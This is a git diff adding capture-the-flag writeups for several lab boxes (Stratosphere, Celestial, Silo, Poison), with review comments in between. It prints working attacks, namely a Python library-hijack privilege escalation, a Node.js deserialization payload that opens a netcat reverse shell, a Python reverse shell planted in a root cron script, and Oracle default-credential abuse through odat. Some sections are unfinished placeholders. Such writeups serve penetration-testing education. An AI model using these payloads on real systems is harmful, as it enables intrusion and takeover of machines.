+ q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
+ md4 = hashlib.new('md4')
+ md4.update(q3.encode())
+ if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
+ print("Yeah, I don't think that's right.")
+ return
+ print("OK, OK! I get it. You know how to crack hashes...")
+ q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
+ blake = hashlib.new('BLAKE2b512')
+ blake.update(q4.encode())
+ if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
+ print("You were so close! urg... sorry rules are rules.")
+ return
+
+ import os
+ os.system('/root/success.py')
+ return
+
+ question()
+
+
+Here we can see a bunch of crackable hashes (which are actually rabbitholes lol), the real vulnerability here is into the libraries that this python script calls : hashlib.py
+
+
+ richard@stratosphere:/usr/lib/python3.5$ cd ~
+ richard@stratosphere:~$ cd /usr/lib/python3.5
+ richard@stratosphere:/usr/lib/python3.5$ ls -lash | grep hashlib
+ 8.0K -rw-r--r-- 1 root root 7.8K Jan 19 2017 hashlib.py
+
+
+
+Obviously we cannot write into this hashlib.py file since we do not have enough permissions to do so, therefore we will create our own hashlib.py in the SAME FOLDER as our test.py and it will take priority over the hashlib we found above. With our own hashlib.py we are able to achieve a privilege escalation via python-library hijacking as demonstrated below :
+
+
+ richard@stratosphere:~$ pwd
+ /home/richard
+
+ richard@stratosphere:~$ ls
+ Desktop test.py user.txt
+
+ richard@stratosphere:~$ echo 'import os;os.system("/bin/bash")' > hashlib.py
+ richard@stratosphere:~$ sudo /usr/bin/python /home/richard/test.py
+ root@stratosphere:/home/richard# id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ root@stratosphere:/home/richard# cat /root/root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
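Review bot: the Conclusion at the end of the hunk ("Here we can see the progress graph :") is followed only by blank lines, so the graph image it refers to never made it into the file; embed it or drop the sentence. The Part 3 explanation also skips the mechanism: "we will create our own hashlib.py in the SAME FOLDER as our test.py and it will take priority" holds because Python puts the script's own directory first on sys.path, so a module there shadows /usr/lib/python3.5/hashlib.py; one sentence saying so would make the point reproducible, and the defensive reading of `(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py` (root running an interpreter, matched by wildcard, on a script that lives in a user-writable home directory) belongs right next to it. Minor: the two `cd` lines before `ls -lash | grep hashlib` appear in reverse order, and "the real vulnerability here is into the libraries" should read "lies in the libraries".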
diff --git a/Medium/22.md b/Medium/22.md
new file mode 100644
index 0000000..42e9fa8
--- /dev/null
+++ b/Medium/22.md
@@ -0,0 +1,195 @@
+# Celestial Writeup
+
+
+
+## Introduction :
+
+Celestial is a Medium linux box released back in March 2018
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nmap -F 10.10.10.85
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 09:26 GMT
+ Nmap scan report for 10.10.10.85
+ Host is up (0.38s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 3000/tcp open ppp
+
+ Nmap done: 1 IP address (1 host up) scanned in 2.82 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nmap -sCV -p3000 10.10.10.85
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 09:27 GMT
+ Nmap scan report for 10.10.10.85
+ Host is up (0.43s latency).
+
+ PORT STATE SERVICE VERSION
+ 3000/tcp open http Node.js Express framework
+ |_http-title: Site doesn't have a title (text/html; charset=utf-8).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.06 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 3000 so let's investigate it:
+
+
+
+Note that the http service running on port 3000 is preety slow / gets throttled so we cannot reasonably use dirsearch. Now since it's quite weird to get 2 different results from curl and from our webbrowser we'll investigate it by using burpsuite, intercepting our request using the interceptor and foxyproxy, and sending it over to the repeater (CTRL+R) and going there (CTRL+SHIFT+R) to see what we're dealing with exactly :
+
+
+
+Now what's interesting here is the cookie's profile parameter which contains a base64 encoded string:
+
+
+
+Do not forget to URL-Decode the base64 encoded string because as you can see the 2 last = signs have been url encoded to %3D.
+
+
+
+From there we get a JSON object parsing where 2+2 equals to 22. here when we look at our last part of the json object we have x"num":"2") so we could assume that we can misuse this concatenation and chain RCE to it. So let's try out a generic Node.js parsing and serialization vulnerability:
+
+_Original JSON:_
+
+
+ {"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}
+
+
+` _Infected JSON:_
+
+
+ {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9001 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) });}()"}
+
+
+Therefore we obtain the combination of the two which is what we're going to use on this box :
+
+
+ {"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9001 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) });}()"}
+
+
+Now as we have seen above, we need to first base64 encode it:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nano infected
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → cat infected | base64
+ eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVt
+ YiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIiLCJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rp
+ b24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3JtIC90bXAvZjtta2ZpZm8gL3Rt
+ cC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjEwIDkwMDEgPi90bXAv
+ ZicsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQp
+ IH0pO30oKSJ9Cg==
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9001
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+
+
+We have to also URL-Encode this base64 encoded string because we have a few + and = signs in there, we encode the string inside burpsuite by selecting the string and then by pressing CTRL+U and then hit send to get our reverse shell connection:
+
+
+
+And we get a reverse shell ! now we just need to grab the user flag:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9001
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+ Ncat: Connection from 10.10.10.85.
+ Ncat: Connection from 10.10.10.85:58818.
+ /bin/sh: 0: can't access tty; job control turned off
+ $ whoami
+ sun
+
+ $ cat /home/sun/Documents/user.txt
+ 9aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have been able to print out the user flag !
+
+## **Part 3 : Getting Root Access**
+
+From there, our first reflex is to try out sudo -l after we spawned a tty shell using python's pty module:
+
+
+ $ sudo -l
+ sudo: no tty present and no askpass program specified
+ $ which python
+ /usr/bin/python
+ $ python -c 'import pty;pty.spawn("/bin/bash")'
+ sun@sun:~/Documents$ sudo -l
+ sudo -l
+ [sudo] password for sun:
+
+
+but we're out of luck, so we poke around the box and we find a writeable python script in /home/sun/Documents :
+
+
+ sun@sun:~/Documents$ ls -lash
+ ls -lash
+ total 16K
+ 4.0K drwxr-xr-x 2 sun sun 4.0K Mar 4 2018 .
+ 4.0K drwxr-xr-x 21 sun sun 4.0K Mar 16 05:23 ..
+ 4.0K -rw-rw-r-- 1 sun sun 29 Sep 21 2017 script.py
+ 4.0K -rw-rw-r-- 1 sun sun 33 Sep 21 2017 user.txt
+
+
+The script in there is being executed by cron as root every 5 minutes, so we can just place our python reverse shell one liner in there and get a root reverse shell once cron executes it.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+
+
+
+` _Terminal 2:_
+
+
+ sun@sun:~/Documents$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > script.py
+
+
+` _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Celestial]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+ Ncat: Connection from 10.10.10.85.
+ Ncat: Connection from 10.10.10.85:43524.
+ /bin/sh: 0: can't access tty; job control turned off
+
+ # id && cat /root/root.txt
+ uid=0(root) gid=0(root) groups=0(root)
+ baXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
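Review bot: the Part 3 claim "The script in there is being executed by cron as root every 5 minutes" is not backed by anything in the hunk (no crontab, syslog or output listing is shown), so add the evidence that led to it or state it as an assumption. In Part 2, the `_$$ND_FUNC$$_` marker is what makes the base64 cookie dangerous (the serializer revives and calls the embedded function when the profile cookie is deserialized), yet the text only calls it "a generic Node.js parsing and serialization vulnerability"; naming the root cause (untrusted deserialization of a user-controlled cookie) would make the writeup useful beyond this one box. Also: the "Infected JSON" block has `cat/tmp/f` where the combined payload below it correctly reads `cat /tmp/f`; the screenshots the text refers to ("let's investigate it:", the Burp repeater view, the cookie, the progress graph) are missing, leaving empty gaps; stray backticks precede "_Infected JSON:_", "_Terminal 2:_" and "_Terminal 1:_"; and "preety" should be "pretty".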
diff --git a/Medium/23.md b/Medium/23.md
new file mode 100644
index 0000000..4898ce3
--- /dev/null
+++ b/Medium/23.md
@@ -0,0 +1,384 @@
+# Silo Writeup
+
+
+
+## Introduction :
+
+Silo is a Medium windows box released back in March 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
+ → nmap -F 10.10.10.82
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 10:50 GMT
+ Nmap scan report for 10.10.10.82
+ Host is up (0.098s latency).
+ Not shown: 92 closed ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+ 49152/tcp open unknown
+ 49153/tcp open unknown
+ 49154/tcp open unknown
+ 49155/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB]
+ → nmap -sCV -p80,135,139,445 10.10.10.82
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 10:51 GMT
+ Nmap scan report for 10.10.10.82
+ Host is up (0.15s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-IIS/8.5
+ |_http-title: IIS Windows Server
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 1m22s, deviation: 0s, median: 1m21s
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: supported
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-03-16T10:52:49
+ |_ start_date: 2020-03-16T10:51:55
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 35.03 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+So we are greeted by a default Windows Server IIS webpage, so we could use dirsearch on it but it won't give us much results that we can use. So we'll move onto the next ports: 135,139 & 445 which are giving an oracle database for us to work with, onto which we'll use the [ODat](https://github.com/quentinhardy/odat) tool. So first let's install it :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
+ → git clone https://github.com/quentinhardy/odat
+ Cloning into 'odat'...
+ remote: Enumerating objects: 180, done.
+ remote: Counting objects: 100% (180/180), done.
+ remote: Compressing objects: 100% (122/122), done.
+ remote: Total 900 (delta 97), reused 112 (delta 58), pack-reused 720
+ Receiving objects: 100% (900/900), 934.49 KiB | 1.77 MiB/s, done.
+ Resolving deltas: 100% (531/531), done.
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
+ → cd odat
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → git submodule init [c47824b]
+ Submodule 'docs' (https://github.com/quentinhardy/odat.wiki.git) registered for path 'docs'
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → git submodule update [c47824b]
+ Cloning into '/home/nihilist/_HTB/Silo/odat/docs'...
+ Submodule path 'docs': checked out '402d0446a807f8c75e07addaf0887a82c739bf1f'
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → sudo apt install libaio1 python3-dev alien python3-pip
+
+
+Once the dependencies installed, we download the rpm file from the oracle [website](https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html)
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
+ --2020-03-16 12:51:55-- https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
+ Resolving download.oracle.com (download.oracle.com)... 23.212.224.6
+ Connecting to download.oracle.com (download.oracle.com)|23.212.224.6|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 27978612 (27M) [application/x-redhat-package-manager]
+ Saving to: ‘oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm’
+
+ oracle-instantclien 100%[===================>] 26.68M 2.38MB/s in 11s
+
+ 2020-03-16 12:52:08 (2.34 MB/s) - ‘oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm’ saved [27978612/27978612]
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → sudo alien --to-deb oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
+ Warning: Skipping conversion of scripts in package oracle-instantclient19.6-basiclite: postinst postrm
+ Warning: Use the --scripts parameter to include the scripts.
+ oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb generated
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo dpkg -i oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb
+ Selecting previously unselected package oracle-instantclient19.6-basiclite.
+ (Reading database ... 572297 files and directories currently installed.)
+ Preparing to unpack oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb ...
+ Unpacking oracle-instantclient19.6-basiclite (19.6.0.0.0-2) ...
+ Setting up oracle-instantclient19.6-basiclite (19.6.0.0.0-2) ...
+ Processing triggers for libc-bin (2.29-10) ...
+
+
+
+Now that we have installed it, we edit our /etc/profle to define the Oracle env variables:
+
+
+ export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
+ export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
+ export PATH=$ORACLE_HOME/bin:$PATH
+
+
+` 
+
+Next step is creating /etc/ld.so.conf.d/oracle.conf and adding the path to Oracle Home:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo nano /etc/ld.so.conf.d/oracle.conf
+
+
+Adding the path to the Oracle Home directory:
+
+
+ /usr/lib/oracle/19.6/client64/lib/
+
+
+Next we update the ldpath:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo ldconfig
+
+
+And finally we pip3 install cx_oracle and by testing it we see that we didn't have any problems so far:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo -s [c47824b]
+ Starting ssh-agent...
+ Identity added: /root/.ssh/id_rsa (root@prometheus)
+ Identity added: /root/.ssh/id_ed25519 (root@prometheus)
+
+ λ root [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → source /etc/profile [c47824b]
+ # pip3 install cx_Oracle [c47824b]
+ Collecting cx_Oracle
+ Downloading https://files.pythonhosted.org/packages/c9/ba/0fb63d616c2856016c13615ac43209b1909b7dbd8c5c461a79922e276678/cx_Oracle-7.3.0-cp37-cp37m-manylinux1_x86_64.whl (742kB)
+ 100% |████████████████████████████████| 747kB 744kB/s
+ Installing collected packages: cx-Oracle
+ Successfully installed cx-Oracle-7.3.0
+ # python3 -c 'import cx_Oracle' [c47824b]
+ #
+
+
+Next up we install the remaining dependencies we need :
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo apt install python3-scapy [c47824b]
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ python3-scapy is already the newest version (2.4.3-3).
+ python3-scapy set to manually installed.
+ The following packages were automatically installed and are no longer required:
+ b43-fwcutter chromium-common chromium-sandbox firmware-b43-installer firmware-b43legacy-installer
+ gnome-brave-icon-theme gnome-colors-common libdns-export1107 libdns1107 libexiv2-14 libicu57 libisc-export1104
+ libisc1104 libjs-jquery-easing libjs-jquery-fancybox libjs-jquery-mousewheel libmicrodns0 libmysofa0 libradare2-3.9
+ libu2f-udev python-apt python-asn1crypto python3-pycountry python3-simplegeneric ruby-diff-lcs ruby-docile
+ ruby-rspec-expectations ruby-rspec-support ruby-simplecov ruby-simplecov-html system-config-printer
+ Use 'sudo apt autoremove' to remove them.
+ 0 upgraded, 0 newly installed, 0 to remove and 123 not upgraded.
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo pip3 install colorlog termcolor pycrypto passlib [c47824b]
+ Collecting colorlog
+ Downloading https://files.pythonhosted.org/packages/00/0d/22c73c2eccb21dd3498df7d22c0b1d4a30f5a5fb3feb64e1ce06bc247747/colorlog-4.1.0-py2.py3-none-any.whl
+ Requirement already satisfied: termcolor in /usr/lib/python3/dist-packages (1.1.0)
+ Requirement already satisfied: pycrypto in /usr/lib/python3/dist-packages (2.6.1)
+ Requirement already satisfied: passlib in /usr/lib/python3/dist-packages (1.7.2)
+ Installing collected packages: colorlog
+ Successfully installed colorlog-4.1.0
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo pip3 install argcomplete && sudo activate-global-python-argcomplete [c47824b]
+ Requirement already satisfied: argcomplete in /usr/lib/python3/dist-packages (1.8.1)
+ Installing bash completion script /etc/bash_completion.d/python-argcomplete.sh
+
+
+
+From there we need to install the development version of pyinstaller (http://www.pyinstaller.org/) for python3.
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → pip3 install pyinstaller [c47824b]
+ Collecting pyinstaller
+ Downloading https://files.pythonhosted.org/packages/3c/c9/c3f9bc64eb11eee6a824686deba6129884c8cbdf70e750661773b9865ee0/PyInstaller-3.6.tar.gz (3.5MB)
+ 100% |████████████████████████████████| 3.5MB 206kB/s
+ Installing build dependencies ... done
+ Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from pyinstaller) (44.0.0)
+ Collecting altgraph (from pyinstaller)
+ Downloading https://files.pythonhosted.org/packages/ee/3d/bfca21174b162f6ce674953f1b7a640c1498357fa6184776029557c25399/altgraph-0.17-py2.py3-none-any.whl
+ Building wheels for collected packages: pyinstaller
+ Running setup.py bdist_wheel for pyinstaller ... done
+ Stored in directory: /home/nihilist/.cache/pip/wheels/62/fe/62/4c0f196d1e0dd689e097449bc81d7d585a7de7dd86b081b80b
+ Successfully built pyinstaller
+ Installing collected packages: altgraph, pyinstaller
+ The scripts pyi-archive_viewer, pyi-bindepend, pyi-grab_version, pyi-makespec, pyi-set_version and pyinstaller are installed in '/home/nihilist/.local/bin' which is not on PATH.
+ Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
+ Successfully installed altgraph-0.17 pyinstaller-3.6
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → ./odat.py -h [c47824b]
+ ERROT: Python 3 has to be used for this version of ODAT
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → python3 odat.py -h
+
+
+AND FINALLY we are able to use the Oracle Database Attacking Tool odat.py:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → python3 odat.py -h [c47824b]
+ odat.py:52: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
+ import imp
+ usage: odat.py [-h] [--version]
+ {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
+ ...
+
+ _ __ _ ___
+ / \| \ / \|_ _|
+ ( o ) o ) o || |
+ \_/|__/|_n_||_|
+ -------------------------------------------
+ _ __ _ ___
+ / \ | \ / \ |_ _|
+ ( o ) o ) o | | |
+ \_/racle |__/atabase |_n_|ttacking |_|ool
+ -------------------------------------------
+
+ By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
+
+ positional arguments:
+ {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
+
+ Choose a main command
+ all to run all modules in order to know what it is possible to do
+ tnscmd to communicate with the TNS listener
+ tnspoison to exploit TNS poisoning attack
+ sidguesser to know valid SIDs
+ passwordguesser to know valid credentials
+ utlhttp to send HTTP requests or to scan ports
+ httpuritype to send HTTP requests or to scan ports
+ utltcp to scan ports
+ ctxsys to read files
+ externaltable to read files or to execute system commands/scripts
+ dbmsxslprocessor to upload files
+ dbmsadvisor to upload files
+ utlfile to download/upload/delete files
+ dbmsscheduler to execute system commands without a standard output
+ java to execute system commands
+ passwordstealer to get hashed Oracle passwords
+ oradbg to execute a bin or script
+ dbmslob to download files
+ stealremotepwds to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
+ userlikepwd to try each Oracle username stored in the DB like the corresponding pwd
+ smb to capture the SMB authentication
+ privesc to gain elevated access
+ cve to exploit a CVE
+ search to search in databases, tables and columns
+ unwrapper to unwrap PL/SQL source code (no for 9i version)
+ clean clean traces and logs
+
+ optional arguments:
+ -h, --help show this help message and exit
+ --version show program's version number and exit
+
+
+
+Let's keep in mind that Oracle databases have a few possible default credentials :
+
+
+ SYSTEM:MANAGER
+ SCOTT:TIGER
+ SYS:CHANGE_ON_INSTALL
+ OUTLN:OUTLN
+ DBSNMP:DBSNMP
+ CTXSYS:CTXSYS
+ MDSYS:MDSYS
+
+
+so we try them manually one by one, until we find that scott:tiger are the correct credentials: Although they may be the correct credentials, we do not know what is the user on the box, so we create a .bat script to be able to list the directories in C:\Users\ :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → echo 'dir /a c:\Users\' > nihilist.bat
+
+
+We upload it using odat.py's dbmsxslprocessor :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → python3 odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" nihilist.bat /home/nihilist/_HTB/Silo/odat/nihilist.bat --sysdba
+
+ [1] (10.10.10.82:1521): Put the /home/nihilist/_HTB/Silo/odat/nihilist.bat local file in the c:/ path (named nihilist.bat) of the 10.10.10.82 server
+ [+] The /home/nihilist/_HTB/Silo/odat/nihilist.bat local file was put in the remote c:/ path (named nihilist.bat)
+
+
+
+Now we use it to list the user directories :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" nihilist.bat --sysdba
+
+
+And looking at the results, we get the username "Phineas" so we grab his user flag:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Phineas/Desktop" "user.txt" "spz.io" --sysdba
+
+ [1] (10.10.10.82:1521): Read the user.txt file stored in the c:/Users/Phineas/Desktop path
+ [+] Data stored in the remote file user.txt stored in c:/Users/Phineas/Desktop
+ 92XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag !
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → sudo python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba
+
+ [1] (10.10.10.82:1521): Read the root.txt file stored in the c:/Users/Administrator/Desktop path
+ [+] Data stored in the remote file root.txt stored in c:/Users/Administrator/Desktop
+ cdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
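Review bot: "the text goes here" under Part 3 is a leftover placeholder; the section needs at least a sentence on why the same scott:tiger login with `--sysdba` can read `c:/Users/Administrator/Desktop` root.txt (most likely because the file access is performed by the database server process rather than by the scott account, which is the privilege-escalation point of this box). In Part 2, "ports: 135,139 & 445 which are giving an oracle database" is wrong: those are MSRPC, NetBIOS and SMB, while the Oracle listener odat itself reports is `(10.10.10.82:1521)`, a port that appears in neither nmap scan in the hunk, so the text should say how the listener was found. Several steps assert results without showing them: "until we find that scott:tiger are the correct credentials" and "looking at the results, we get the username Phineas" have no output, the `externaltable --exec "dir C:/" nihilist.bat` line is given without its result, and the third `--getFile` argument "spz.io" (the local destination filename) is never explained. Minor: "/etc/profle" should be "/etc/profile", and the Conclusion's "progress graph" is followed by blank lines with no image.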
diff --git a/Medium/24.md b/Medium/24.md
new file mode 100644
index 0000000..0c0c6f8
--- /dev/null
+++ b/Medium/24.md
@@ -0,0 +1,361 @@
+# Poison Writeup
+
+
+
+## Introduction :
+
+Poison is a Medium FreeBSD box released back in March 2018
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nmap -F 10.10.10.84 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 13:57 GMT
+ Nmap scan report for 10.10.10.84
+ Host is up (0.10s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nmap -sCV -Pn 10.10.10.84 -p22,80
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 13:57 GMT
+ Nmap scan report for 10.10.10.84
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
